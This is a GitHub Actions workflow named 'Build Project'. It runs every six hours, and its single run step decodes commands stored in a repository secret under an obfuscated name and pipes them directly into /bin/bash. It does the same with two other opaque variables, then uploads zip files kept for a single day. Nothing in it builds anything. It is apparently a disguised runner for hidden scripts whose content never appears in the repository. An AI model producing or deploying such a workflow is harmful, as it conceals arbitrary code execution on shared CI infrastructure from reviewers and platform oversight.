name: Build Project
on:
  workflow_dispatch:

  schedule:
    - cron: '54 3,9,15,21 * * *'
permissions:
  contents: read
  actions: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  execute:
    name: Main task
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4
      - name: Run
        env:
          hgkd5: ${{ secrets.hgkd5 }}
        run: |
          printf '%s' "$hgkd5" | jq -r .qn78 | /bin/bash
          echo $fghr5 | jq -r .vb72257 | /bin/bash
          printf '%s' "$zkck91" | jq -r .a80709 | /bin/bash

      - name: Store results
        uses: actions/upload-artifact@v4
        with:
          name: 8fdNfpQ9
          path: "*.zip"
          retention-days: 1
